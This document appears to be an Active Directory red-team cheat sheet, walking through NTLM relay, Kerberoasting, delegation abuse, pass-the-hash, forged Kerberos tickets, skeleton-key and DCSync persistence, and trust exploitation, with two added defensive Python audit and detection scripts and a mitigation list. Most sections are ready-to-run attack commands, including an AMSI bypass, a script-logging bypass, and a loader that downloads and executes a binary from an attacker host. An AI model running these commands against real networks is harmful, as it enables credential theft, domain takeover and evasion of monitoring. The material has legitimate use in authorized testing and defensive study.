This guide provides a complete reference for Active Directory (AD) security, covering enumeration, exploitation, lateral movement, and persistence techniques commonly used in penetration testing and red team engagements.

  1. AD Fundamentals
  2. Initial Access & Authentication Attacks
  3. Enumeration Techniques
  4. Privilege Escalation
  5. Lateral Movement
  6. Persistence Mechanisms
  7. Domain Dominance
  8. Forest & Trust Exploitation

AD Fundamentals

Core Components

  • Domain Controllers (DC): Central servers managing AD, holding the NTDS.dit database
  • Forests & Trees: Hierarchical structure containing domains
  • Users & Groups: Four main types - Domain Admins, Service Accounts, Local Administrators, Domain Users
  • Trusts: Enable resource access between domains; each trust has a direction (one-way or two-way) and is either transitive or non-transitive
  • Group Policy Objects (GPO): Define rules and settings across the domain
  • Kerberos: Default authentication protocol using tickets (TGT/TGS)
  • NTLM: Legacy authentication protocol still widely used

Key Services

  • LDAP: Lightweight Directory Access Protocol for querying AD
  • SMB: File sharing and remote access protocol
  • WinRM: Windows Remote Management (ports 5985/5986)
  • DNS: Critical for AD name resolution

Initial Access & Authentication Attacks

NTLM Relay Attacks

NTLM relay forwards a victim's challenge-response authentication to another server and authenticates there as the victim; it succeeds against targets that do not require SMB signing (or, for LDAP targets, signing and channel binding):

```shell
# Start NTLM relay listener
sudo ntlmrelayx.py -t ldaps://172.16.2.1 -wh attacker-ip --http-port '80,8080' -i

# Trigger authentication using responder
sudo responder -I eth0
```

LDAP Pass-back Attacks

Exploit devices or applications that authenticate against LDAP by redirecting them to a rogue LDAP server that accepts plaintext credentials:

  1. Configure a rogue LDAP server:

```shell
sudo apt -y install slapd ldap-utils
sudo dpkg-reconfigure -p low slapd
```

  2. Create a downgraded configuration (olcSaslSecProps.ldif):

```ldif
dn: cn=config
changetype: modify
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```

  3. Capture credentials:

```shell
sudo tcpdump -SX -i eth0 tcp port 389
```

Kerberos Attacks

AS-REP Roasting

Target accounts with Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH flag in userAccountControl); their AS-REP can be requested without credentials and cracked offline:

```powershell
# Using Rubeus
Rubeus.exe asreproast /format:john /outfile:asrep-hashes.txt
```

```shell
# Using Impacket
GetNPUsers.py domain.local/ -no-pass -usersfile users.txt
```

Kerberoasting

Request service tickets for accounts that have an SPN; each ticket is encrypted with the service account's password hash and can be cracked offline:

```powershell
# List Kerberoastable accounts
Rubeus.exe kerberoast /stats

# Request all service tickets
Rubeus.exe kerberoast /rc4opsec /outfile:kerb-hashes.txt

# Target specific user
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
```

Crack with Hashcat:

```shell
hashcat -m 13100 kerb-hashes.txt wordlist.txt
```

Enumeration Techniques

PowerView Commands

Domain Enumeration

```powershell
# Current domain info
Get-Domain
Get-DomainSID

# Domain policy
Get-DomainPolicyData

# Domain controllers
Get-DomainController

# All users
Get-DomainUser
Get-DomainUser -Identity username -Properties *

# Groups
Get-DomainGroup | select Name
Get-DomainGroup *admin*
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# Computers
Get-DomainComputer | select dnshostname
Get-DomainComputer -OperatingSystem "*Server 2019*"

# Service Principal Names
Get-DomainUser -SPN

# Shares
Invoke-ShareFinder -Verbose
```

ACL Enumeration

```powershell
# ACLs for specific object
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs

# Find interesting ACLs for a user
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "username"}
```

BloodHound Collection

```powershell
# Comprehensive collection
SharpHound.exe --collectionmethods All --excludedcs

# Stealthy collection
SharpHound.exe --stealth --collectionmethods Group,LocalAdmin,Session,Trusts
```

Trust Enumeration

```powershell
# Domain trusts
Get-DomainTrust

# Forest trusts
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name}

# External trusts (TrustAttributes is a flag set, so match rather than compare for equality)
Get-DomainTrust | ?{$_.TrustAttributes -match "FILTER_SIDS"}
```

Privilege Escalation

Local Privilege Escalation

PowerUp

```powershell
. .\PowerUp.ps1
Invoke-AllChecks

# Abuse vulnerable service
Invoke-ServiceAbuse -Name 'VulnService' -UserName 'domain\user'
```

Kerberos Delegation Attacks

Unconstrained Delegation

Find and exploit servers with unconstrained delegation:

```powershell
# Find servers
Get-DomainComputer -Unconstrained

# Monitor for tickets (on compromised server)
Rubeus.exe monitor /interval:5 /nowrap

# Trigger printer bug to capture DC ticket
MS-RPRN.exe \\dc.domain.local \\compromised-server.domain.local

# Use captured ticket
Rubeus.exe ptt /ticket:base64-ticket
```

Constrained Delegation

Abuse service accounts with constrained delegation:

```powershell
# Find accounts
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Request TGT and get alternate service ticket
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:administrator /msdsspn:"cifs/target.domain.local" /ptt
```

Resource-Based Constrained Delegation

If you have write access to a computer object (specifically to its msDS-AllowedToActOnBehalfOfOtherIdentity attribute):

```powershell
# Add fake computer
New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force)

# Configure RBCD ($rbcd_bytes holds the raw security descriptor granting fake01$; its construction is not shown here)
Set-DomainObject -Identity "target-computer" -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$rbcd_bytes}

# Get service ticket
Rubeus.exe s4u /user:fake01$ /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt
```
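The pre-authentication, SPN and delegation settings abused in this section and under AS-REP Roasting and Kerberoasting are all plain directory attributes, so a defender can audit for them before an attacker does. The following is an added example, not code from the original guide: it decodes userAccountControl and the two delegation attributes from a constructed LDAP-style export (the attribute names and flag values are the real schema values; the sample accounts are invented).

```python
"""Audit directory objects for the roasting and delegation weaknesses covered above.
Added example, not from the original guide: runs over a constructed list of
attribute dictionaries shaped like an LDAP search result."""

# userAccountControl bits, as documented by Microsoft
ACCOUNTDISABLE = 0x2
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
DONT_REQ_PREAUTH = 0x400000                 # AS-REP roastable
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
DOMAIN_CONTROLLERS_RID = 516                # DCs legitimately hold TRUSTED_FOR_DELEGATION


def audit_object(obj):
    """Return the list of findings for one user or computer object."""
    uac = int(obj.get("userAccountControl", 0))
    name = obj["sAMAccountName"]
    findings = []
    if uac & ACCOUNTDISABLE:
        return findings  # disabled accounts cannot be roasted or delegated
    if uac & DONT_REQ_PREAUTH:
        findings.append("AS-REP roastable: pre-authentication not required")
    if obj.get("servicePrincipalName") and not name.endswith("$") and name.lower() != "krbtgt":
        findings.append("Kerberoastable: user account with an SPN")
    if uac & TRUSTED_FOR_DELEGATION and obj.get("primaryGroupID") != DOMAIN_CONTROLLERS_RID:
        findings.append("unconstrained delegation on a non-DC host")
    targets = obj.get("msDS-AllowedToDelegateTo", [])
    if targets:
        mode = "protocol transition" if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "Kerberos-only"
        findings.append("constrained delegation (%s) to %s" % (mode, ", ".join(targets)))
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("RBCD descriptor present: review the principals it grants")
    return findings


def audit_directory(objects):
    """Map sAMAccountName -> findings for every object that has any."""
    return {o["sAMAccountName"]: f for o in objects if (f := audit_object(o))}


# Constructed sample export (not real directory data)
SAMPLE = [
    {"sAMAccountName": "svcadmin", "userAccountControl": 0x200 | DONT_REQ_PREAUTH,
     "servicePrincipalName": ["MSSQLSvc/sql01.domain.local:1433"]},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202, "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000, "primaryGroupID": DOMAIN_CONTROLLERS_RID},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["cifs/fileserver.domain.local"]},
    {"sAMAccountName": "FILE01$", "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},
]
```

Feed `audit_directory` the result of an LDAP search over users and computers to get the same report for a live domain; a disabled account and a domain controller with unconstrained delegation produce no findings.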

GPO Abuse

With write access to a GPO:

```shell
# Using gpoddity
python3 gpoddity.py --gpo-id 'GPO-GUID' --domain 'domain.local' --username 'user' --password 'pass' --command 'net localgroup administrators user /add' --dc-ip '10.10.10.1'
```

Lateral Movement

PowerShell Remoting

```powershell
# Interactive session
Enter-PSSession -ComputerName target

# Execute commands
Invoke-Command -ComputerName target -ScriptBlock {whoami}
Invoke-Command -ComputerName (Get-Content servers.txt) -FilePath script.ps1

# Pass credentials
$cred = Get-Credential
Invoke-Command -ComputerName target -Credential $cred -ScriptBlock {whoami}
```

Pass-the-Hash / Pass-the-Ticket

Using Mimikatz

```text
# PTH with NTLM hash
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe

# PTT with Kerberos ticket
kerberos::ptt ticket.kirbi
```

Using Rubeus

```powershell
# Pass-the-hash (create new process)
Rubeus.exe asktgt /user:administrator /rc4:hash /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# Pass-the-ticket
Rubeus.exe ptt /ticket:base64-ticket
```

WMI and PSExec

```powershell
# WMI execution
wmic /node:target process call create "cmd.exe /c payload.exe"

# PSExec
PsExec.exe \\target -u domain\user -p password cmd.exe
```

Persistence Mechanisms

Golden Ticket

Create a forged TGT valid for any service:

```text
# Get krbtgt hash via DCSync (Mimikatz)
lsadump::dcsync /user:domain\krbtgt

# Create golden ticket with Rubeus
Rubeus.exe golden /aes256:krbtgt_aes_key /sid:S-1-5-21-xxx /user:Administrator /id:500 /pgid:513 /domain:domain.local /ptt

# Create with Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:hash /id:500 /ptt
```

Silver Ticket

Forge service tickets for specific services, using that service account's key rather than the krbtgt key:

```powershell
# HTTP service
Rubeus.exe silver /service:http/server.domain.local /rc4:service_hash /sid:domain_sid /user:Administrator /ptt

# Multiple services (e.g., WMI needs both host and rpcss)
Rubeus.exe silver /service:host/server.domain.local /rc4:hash /sid:domain_sid /user:Administrator /ptt
Rubeus.exe silver /service:rpcss/server.domain.local /rc4:hash /sid:domain_sid /user:Administrator /ptt
```

Diamond Ticket

A stealthier forgery: request a legitimate TGT, decrypt it with the krbtgt key, modify its PAC and re-encrypt it, so the ticket keeps realistic fields that a fully forged golden ticket lacks:

```powershell
Rubeus.exe diamond /krbkey:krbtgt_aes_key /tgtdeleg /enctype:aes /ticketuser:administrator /domain:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /ptt
```

Skeleton Key

Backdoor allowing authentication with a master password:

```text
# Inject skeleton key into LSASS on the DC (Mimikatz; master password: mimikatz)
misc::skeleton

# Use backdoor
net use \\target\c$ /user:domain\administrator mimikatz
```

ACL Persistence

AdminSDHolder Abuse

```powershell
# Add user to AdminSDHolder ACL
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity user -Rights All
```

DCSync Rights

```powershell
# Grant DCSync permissions (PowerView)
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity user -Rights DCSync
```

```text
# Execute DCSync (Mimikatz)
lsadump::dcsync /user:domain\krbtgt
```

DSRM Persistence

Abuse Directory Services Restore Mode: the DSRM administrator is a local account on the DC whose password is set independently of domain credentials, and this registry value lets it log on while the DC is running normally:

```powershell
# Enable DSRM logon
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Use DSRM admin account (local admin on DC)
```

Domain Dominance

DCSync Attack

Extract password hashes from the Domain Controller:

```text
# Using Mimikatz
lsadump::dcsync /user:domain\krbtgt /domain:domain.local

# Using SafetyKatz (bypass some AV)
SafetyKatz.exe "lsadump::dcsync /user:domain\administrator" "exit"

# Remote DCSync with credentials (Impacket)
secretsdump.py domain/user:password@dc-ip
```

Mass Credential Extraction

```text
# From LSASS on DC (Mimikatz)
privilege::debug
sekurlsa::logonpasswords

# From NTDS.dit
ntdsutil "activate instance ntds" "ifm" "create full C:\temp" quit quit
secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
```

Forest & Trust Exploitation

Child to Parent Domain Escalation

Forge an inter-realm TGT whose SID history carries the parent domain's Enterprise Admins SID (RID 519):

```text
# Get trust key (Mimikatz)
lsadump::trust /patch

# Create inter-realm TGT
kerberos::golden /user:Administrator /domain:child.domain.local /sid:child-sid /sids:parent-sid-519 /rc4:trust-key /service:krbtgt /target:parent.domain.local /ticket:ticket.kirbi
```

Cross-Forest Attacks

Exploit bidirectional trusts:

```powershell
# Enumerate foreign users/groups
Get-DomainForeignUser
Get-DomainForeignGroupMember

# Kerberoast across trust
Rubeus.exe kerberoast /domain:trusting.forest /dc:foreign-dc.trusting.forest
```

MSSQL Server Trust Abuse

Chain database links for execution:

```sql
-- Enumerate links
EXEC sp_linkedservers

-- Execute commands through links
EXEC ('sp_configure ''xp_cmdshell'',1;reconfigure') AT "linked.server"
EXEC ('xp_cmdshell ''whoami''') AT "linked.server"
```

Detection Evasion Techniques

AMSI Bypass

```powershell
# Simple bypass
[Ref].Assembly.GetType('System.Management.Automation.'+$('AmsiUtils')).GetField($('amsiInitFailed'),'NonPublic,Static').SetValue($null,$true)
```

Enhanced Logging Bypass

```powershell
# Disable script block logging
[ScriptBlock]."GetField"('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
```

AV Evasion with Custom Loaders

```powershell
# Load tools in memory
$data = (New-Object System.Net.WebClient).DownloadData('http://attacker/tool.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Tool.Program]::Main("")
```

Defensive Considerations

Key Mitigations

  1. Enable SMB Signing: Prevents NTLM relay attacks
  2. Disable LLMNR/NBT-NS: Reduces poisoning attacks
  3. LAPS Implementation: Unique local admin passwords
  4. Credential Guard: Protects against credential theft
  5. Protected Users Group: Additional authentication protections
  6. Audit Policies: Monitor for suspicious activity
  7. Least Privilege: Minimize service account permissions
  8. Network Segmentation: Limit lateral movement
  9. Regular Updates: Patch domain controllers and systems
  10. MFA on Privileged Accounts: Additional authentication layer

Detection Opportunities

  • Monitor for:
    • Kerberoasting activity (Event ID 4769 with RC4)
    • DCSync operations (Event ID 4662)
    • Unusual process creation on DCs
    • Anomalous service ticket requests
    • Pass-the-hash indicators
    • Golden ticket usage patterns
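The Event IDs listed above only become usable detections once the legitimate noise is filtered out. The following is an added example, not from the original guide: it applies the RC4 (encryption type 0x17) filter to 4769 events and the replication-right GUID filter to 4662 events over constructed sample records, excluding krbtgt and computer-account tickets and DC-to-DC replication.

```python
"""Flag Kerberoasting (4769 with RC4) and DCSync (4662 with replication rights) in Security
event records; added example, not from the original guide, over constructed sample events."""

# Control-access right GUIDs that DCSync needs (Active Directory schema values)
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC (etype 23)

def is_kerberoast(ev):
    """Successful 4769 (TGS request) encrypted with RC4 for a user service account."""
    if ev["EventID"] != 4769 or ev.get("Status", "0x0") != "0x0":
        return False
    svc = ev["ServiceName"].lower()
    if svc == "krbtgt" or svc.endswith("$"):
        return False  # TGT renewals and computer-account tickets are normal noise here
    return ev["TicketEncryptionType"].lower() == RC4_HMAC

def is_dcsync(ev, dc_accounts):
    """4662 granting a replication right to an actor that is not a domain controller."""
    if ev["EventID"] != 4662 or ev["SubjectUserName"].lower() in dc_accounts:
        return False  # DC-to-DC replication is expected
    props = ev.get("Properties", "").lower()
    return any(guid in props for guid in REPLICATION_GUIDS)

def detect(events, dc_accounts):
    """Return (rule, actor, target) tuples for every suspicious event."""
    alerts = []
    for ev in events:
        if is_kerberoast(ev):
            alerts.append(("kerberoast", ev["TargetUserName"], ev["ServiceName"]))
        if is_dcsync(ev, dc_accounts):
            alerts.append(("dcsync", ev["SubjectUserName"], ev["ObjectName"]))
    return alerts

# Constructed sample events (not from a real log); dc_accounts is the lower-cased set of DC machine accounts
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "svcadmin",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "WEB01$",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectName": "DC=domain,DC=local",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectName": "DC=domain,DC=local",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]
```

A single RC4 ticket for one service account is a lead rather than proof; a burst of them from one TargetUserName across many ServiceName values is the Kerberoasting pattern worth alerting on.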

Tools Reference

Enumeration & Exploitation

  • PowerView: AD enumeration toolkit
  • BloodHound: Graph-based AD analysis
  • Rubeus: Kerberos abuse toolkit
  • Mimikatz: Credential extraction
  • Impacket: Python AD attack tools
  • CrackMapExec: Network authentication testing
  • Responder: LLMNR/NBT-NS poisoning
  • mitm6: IPv6 DNS takeover

Post-Exploitation

  • SafetyKatz: AV-evasive Mimikatz
  • SharpHound: BloodHound data collector
  • PowerUp: Local privilege escalation
  • Kekeo: Kerberos exploitation
  • ADModule: PowerShell AD management

Persistence & Stealth

  • SharPersist: Windows persistence toolkit
  • PowerSploit: PowerShell attack framework
  • Empire: Post-exploitation framework
  • Covenant: .NET C2 framework

Remember: These techniques should only be used in authorized penetration testing engagements with proper written permission. Unauthorized access to computer systems is illegal.